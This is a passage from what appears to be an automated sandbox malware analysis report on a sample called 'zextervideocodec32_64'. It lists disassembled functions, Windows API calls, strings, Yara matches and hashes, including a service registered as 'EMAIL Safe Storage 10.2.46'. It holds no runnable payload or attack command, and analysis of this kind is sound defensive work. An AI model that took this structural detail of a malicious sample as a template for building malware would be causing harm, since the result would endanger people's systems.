                                                                                                      • _free.LIBCMT ref: 02BD83E8
                                                                                                      • _free.LIBCMT ref: 02BD8410
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                      • String ID: 0Y~
                                                                                                      • API String ID: 3064303923-133072548
                                                                                                      • Opcode ID: 6377e0ba6522d90a3848ee106bdd1dfde21c163521eb7a4b56f4c70862f1e998
                                                                                                      • Instruction ID: 7a935d40a15f4c5d1dfe5af6cf71428e190319518821afb9d8b7808b89e3473b
                                                                                                      • Opcode Fuzzy Hash: 6377e0ba6522d90a3848ee106bdd1dfde21c163521eb7a4b56f4c70862f1e998
                                                                                                      • Instruction Fuzzy Hash: 0B21A632D41251DBDBA59F28F8805857B69F7043B53184CAAEE1C97240FB35986ECF90
                                                                                                      Function 02BC24E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC24E6
                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02BC24FC
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BC250E
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC256D
                                                                                                      • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02BC257F
                                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02BC2599
                                                                                                      • GetLastError.KERNEL32(?,7591DFB0), ref: 02BC25A2
                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC25F0
                                                                                                      • InterlockedDecrement.KERNEL32(00000002), ref: 02BC262F
                                                                                                      • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02BC268E
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC2699
                                                                                                      • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02BC26AD
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02BC26BD
                                                                                                      • GetLastError.KERNEL32(?,7591DFB0), ref: 02BC26C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 1213838671-0
                                                                                                      • Opcode ID: eb0e709e7cfa5b0e5d750c303548cbf5d74861e96ee2b517ce45a233b60145eb
                                                                                                      • Instruction ID: e8b3cf8c6d19b4d3e609be6fa1ce85802069e726646e7eb97b025e2475c2ea64
                                                                                                      • Opcode Fuzzy Hash: eb0e709e7cfa5b0e5d750c303548cbf5d74861e96ee2b517ce45a233b60145eb
                                                                                                      • Instruction Fuzzy Hash: 65613E71900209EFCB10DFA4D584AAEFBB9FF48354F20496EE916E7241EB349954DF60
                                                                                                      Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegisterServiceCtrlHandlerA.ADVAPI32(EMAIL Safe Storage 10.2.46,Function_0000235E), ref: 004023C1
                                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
                                                                                                      • GetLastError.KERNEL32 ref: 00402422
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                                      • GetLastError.KERNEL32 ref: 00402450
                                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402480
                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                                      • CloseHandle.KERNEL32 ref: 004024A1
                                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 004024CA
                                                                                                      Strings
                                                                                                      • EMAIL Safe Storage 10.2.46, xrefs: 004023BC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                                      • String ID: EMAIL Safe Storage 10.2.46
                                                                                                      • API String ID: 3346042915-4190116034
                                                                                                      • Opcode ID: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                                      • Instruction ID: b8fe7bda3a7dcfcb82ad829e681adc6a99cb3bee06a9baca5ac2dc3afb04543b
                                                                                                      • Opcode Fuzzy Hash: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                                      • Instruction Fuzzy Hash: E121C570441214EBC2105F16EFE9A267FA8FBD5794711823EE544B22B2CBB90549CFAD
                                                                                                      Function 00403BA2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BBD
                                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BD1
                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BFD
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C35
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C57
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C70
                                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403C83
                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403CC1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                      • String ID: 4/@
                                                                                                      • API String ID: 1823725401-3101945251
                                                                                                      • Opcode ID: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                                      • Instruction ID: a2970ceca2a6c3f976dc545d3d2173026391ae6ff2d108e1c7f08cdddd2a955e
                                                                                                      • Opcode Fuzzy Hash: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                                      • Instruction Fuzzy Hash: AD31F27350C1245EE7202F785DC883B7E9CEA4534A711093FF942F3380EA798E81466D
                                                                                                      Function 02BC3423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC3428
                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02BC346B
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02BC3472
                                                                                                      • GetLastError.KERNEL32 ref: 02BC3486
                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02BC34D7
                                                                                                      • RtlEnterCriticalSection.NTDLL(00000018), ref: 02BC34ED
                                                                                                      • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02BC3518
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                                      • String ID: CancelIoEx$KERNEL32
                                                                                                      • API String ID: 2902213904-434325024
                                                                                                      • Opcode ID: 5d0c8281ac5d425ce1b10f6cc45feeb2070230bae91507cd8ec7f397f5af6eec
                                                                                                      • Instruction ID: 654453049a3b094e0a51ccedb5a409bdf4b09707eed5de98c54978691addb770
                                                                                                      • Opcode Fuzzy Hash: 5d0c8281ac5d425ce1b10f6cc45feeb2070230bae91507cd8ec7f397f5af6eec
                                                                                                      • Instruction Fuzzy Hash: 8E318FB1900215DFDB11AF68C884AAEBBF9FF48310F1488D9E8169B242DB74D901CFA1
                                                                                                      Function 00406578 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404381,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 0040658A
                                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065A2
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065B3
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004065C0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                      • API String ID: 2238633743-4044615076
                                                                                                      • Opcode ID: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
                                                                                                      • Instruction ID: 34c45dea863b0ad37b671b2ee6745cf1fa65c172ae9c71c573f5c1b511995102
                                                                                                      • Opcode Fuzzy Hash: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
                                                                                                      • Instruction Fuzzy Hash: FA017571A40201FFCB209FB5BFC492B3AE99B58690306193FB541F2291DE79C815DB68
                                                                                                      Function 00406857 Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406899
                                                                                                      • LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004068B5
                                                                                                      • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00406317,?,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 004068FE
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406936
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 0040698E
                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406317,00200020,00000000,?,00000000), ref: 004069A4
                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00406317,00000000,00406317,?,?,00406317,00200020,00000000,?,00000000), ref: 004069D7
                                                                                                      • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 00406A3F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 352835431-0
                                                                                                      • Opcode ID: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
                                                                                                      • Instruction ID: 8dbeb6cb8c932cbdef2775d2a29e2de0fc7c35b208bd80b0a47b5516e3ba15ce
                                                                                                      • Opcode Fuzzy Hash: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
                                                                                                      • Instruction Fuzzy Hash: 3E518A71500209EBCF219F94CD45AAF7BB5FB49714F12413AF912B12A0C73A8C21DB69
                                                                                                      Function 0040425D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 004042CA
                                                                                                      • GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004043A0
                                                                                                      • WriteFile.KERNEL32(00000000), ref: 004043A7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                      • API String ID: 3784150691-4022980321
                                                                                                      • Opcode ID: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
                                                                                                      • Instruction ID: ad501088bf1d437e3d5a217a77e101a13ac7783d72fc0021c8d9dd27a33d1b06
                                                                                                      • Opcode Fuzzy Hash: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
                                                                                                      • Instruction Fuzzy Hash: 52318772600218AFDF2096608E45FDA736DAF85304F1004BFF944B61D1EA789D458A5D
                                                                                                      Function 02BD15F0 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OpenEventA.KERNEL32(00100002,00000000,00000000,C802D0CE), ref: 02BD1690
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BD16A5
                                                                                                      • ResetEvent.KERNEL32(00000000,C802D0CE), ref: 02BD16AF
                                                                                                      • CloseHandle.KERNEL32(00000000,C802D0CE), ref: 02BD16E4
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C802D0CE), ref: 02BD175A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BD176F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseEventHandle$CreateOpenReset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1285874450-0
                                                                                                      • Opcode ID: 3ef6dd090ad0833c0fbfe804b7e75941e54f372d2c7c1a6e83647bcb5b37d0bf
                                                                                                      • Instruction ID: 1a9eab4d2aaebcb3ce77f2d02925a44f63bc80512f9c6ce06b9d18c7b6c69814
                                                                                                      • Opcode Fuzzy Hash: 3ef6dd090ad0833c0fbfe804b7e75941e54f372d2c7c1a6e83647bcb5b37d0bf
                                                                                                      • Instruction Fuzzy Hash: 91414C74D15348ABDF20CFE9C844BEDBBB8EF05764F144299E818EB280E7319905CBA1
                                                                                                      Function 02BC2081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC20AC
                                                                                                      • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02BC20CD
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC20D8
                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02BC213E
                                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02BC217A
                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02BC2187
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                                      • String ID:
                                                                                                      • API String ID: 1171374749-0
                                                                                                      • Opcode ID: 545791888c1100b96177d9fb3803b980554c6b15ab98652451b6578ec992f149
                                                                                                      • Instruction ID: 1f548319ec1cc3a073c7572ad733c8dacda810c243d4a6ee7d1ebb0ab6fd8668
                                                                                                      • Opcode Fuzzy Hash: 545791888c1100b96177d9fb3803b980554c6b15ab98652451b6578ec992f149
                                                                                                      • Instruction Fuzzy Hash: 5A413871504701AFC311DF25D884A6BBBF9FBC8654F100A5EF8AA83251DB30E545DFA1
                                                                                                      Function 02BD1702 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BD1EB0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02BD170E,?,?), ref: 02BD1EDF
                                                                                                        • Part of subcall function 02BD1EB0: CloseHandle.KERNEL32(00000000,?,?,02BD170E,?,?), ref: 02BD1EF4
                                                                                                        • Part of subcall function 02BD1EB0: SetEvent.KERNEL32(00000000,02BD170E,?,?), ref: 02BD1F07
                                                                                                      • OpenEventA.KERNEL32(00100002,00000000,00000000,C802D0CE), ref: 02BD1690
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BD16A5
                                                                                                      • ResetEvent.KERNEL32(00000000,C802D0CE), ref: 02BD16AF
                                                                                                      • CloseHandle.KERNEL32(00000000,C802D0CE), ref: 02BD16E4
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BD1715
                                                                                                        • Part of subcall function 02BD453A: RaiseException.KERNEL32(?,?,02BCFB35,?,?,?,?,?,?,?,02BCFB35,?,02BF0F98,?), ref: 02BD458F
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C802D0CE), ref: 02BD175A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BD176F
                                                                                                        • Part of subcall function 02BD1BF0: GetCurrentProcessId.KERNEL32(?), ref: 02BD1C49
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,C802D0CE), ref: 02BD177F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227236058-0
                                                                                                      • Opcode ID: 237c2f9773437e5e95d9c27c0ad75658a5f34f6008cf3ef50af9de064fccc0d0
                                                                                                      • Instruction ID: 23e3855400729efe8dff9fa9793e2ce27871eeb74fcdbb0fefc95fce231c0ad6
                                                                                                      • Opcode Fuzzy Hash: 237c2f9773437e5e95d9c27c0ad75658a5f34f6008cf3ef50af9de064fccc0d0
                                                                                                      • Instruction Fuzzy Hash: 7B313975D11309ABDF20DAE89844BEDB7B9EF05364F144299E81CEB290FB319905CB61
                                                                                                      Function 02BD5D74 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __init_pointers.LIBCMT ref: 02BD5D74
                                                                                                        • Part of subcall function 02BD84E2: RtlEncodePointer.NTDLL(00000000), ref: 02BD84E5
                                                                                                        • Part of subcall function 02BD84E2: __initp_misc_winsig.LIBCMT ref: 02BD8500
                                                                                                        • Part of subcall function 02BD84E2: GetModuleHandleW.KERNEL32(kernel32.dll,?,02BF1598,00000008,00000003,02BF0F7C,?,00000001), ref: 02BD9261
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02BD9275
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02BD9288
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02BD929B
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02BD92AE
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02BD92C1
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02BD92D4
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02BD92E7
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02BD92FA
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02BD930D
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02BD9320
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02BD9333
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02BD9346
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02BD9359
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02BD936C
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02BD937F
                                                                                                      • __mtinitlocks.LIBCMT ref: 02BD5D79
                                                                                                      • __mtterm.LIBCMT ref: 02BD5D82
                                                                                                        • Part of subcall function 02BD5DEA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02BD8918
                                                                                                        • Part of subcall function 02BD5DEA: _free.LIBCMT ref: 02BD891F
                                                                                                        • Part of subcall function 02BD5DEA: RtlDeleteCriticalSection.NTDLL(02BF3978), ref: 02BD8941
                                                                                                      • __calloc_crt.LIBCMT ref: 02BD5DA7
                                                                                                      • __initptd.LIBCMT ref: 02BD5DC9
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02BD5DD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3567560977-0
                                                                                                      • Opcode ID: 185837d606cceeec75aa612c30380b9fba4cd5d89b3a69dfd06b3d9ced4b6c33
                                                                                                      • Instruction ID: 20fd1b4524f28a7ff5b643eee8266f40a3c4db4814f1e9d7b878f577f74c9599
                                                                                                      • Opcode Fuzzy Hash: 185837d606cceeec75aa612c30380b9fba4cd5d89b3a69dfd06b3d9ced4b6c33
                                                                                                      • Instruction Fuzzy Hash: E4F0B4325497122EE67876B97C0DBDA2B86DF01774B600AD9E4A4C60D0FF2094824B60
                                                                                                      Function 02BD34A1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02BD3453,00000000), ref: 02BD34BB
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02BD34C2
                                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 02BD34CE
                                                                                                      • RtlDecodePointer.NTDLL(00000001), ref: 02BD34EB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                      • API String ID: 3489934621-340411864
                                                                                                      • Opcode ID: da57e8ec307e31e3fa7ca307c691e92e4d00a1004eb37b0297afbb18052a1622
                                                                                                      • Instruction ID: 9640afc1fe359f5d0068815d0a3cb5f5e1aa0903fc81bf2a5d70d63c56093743
                                                                                                      • Opcode Fuzzy Hash: da57e8ec307e31e3fa7ca307c691e92e4d00a1004eb37b0297afbb18052a1622
                                                                                                      • Instruction Fuzzy Hash: A7E09A70ED0340EBEF605FB0EC49F0237A9AB00782F2058A4BA12EB190DFB554A49F11
                                                                                                      Function 02BD3576 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02BD3490), ref: 02BD3590
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02BD3597
                                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 02BD35A2
                                                                                                      • RtlDecodePointer.NTDLL(02BD3490), ref: 02BD35BD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                      • API String ID: 3489934621-2819208100
                                                                                                      • Opcode ID: 9537c77b9b65accb1905a52d13ba6d0474a6c459c294805f0b19c7806b714d33
                                                                                                      • Instruction ID: 8d16eda8f5042ee53230025e28c0d7322441d288a7e57a08989131aff5e95683
                                                                                                      • Opcode Fuzzy Hash: 9537c77b9b65accb1905a52d13ba6d0474a6c459c294805f0b19c7806b714d33
                                                                                                      • Instruction Fuzzy Hash: A0E01A70DC0300EAEE504BB0AD4CB0537A8B710785F204894BA0296165DF755160DB15
                                                                                                      Function 02BD1F10 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
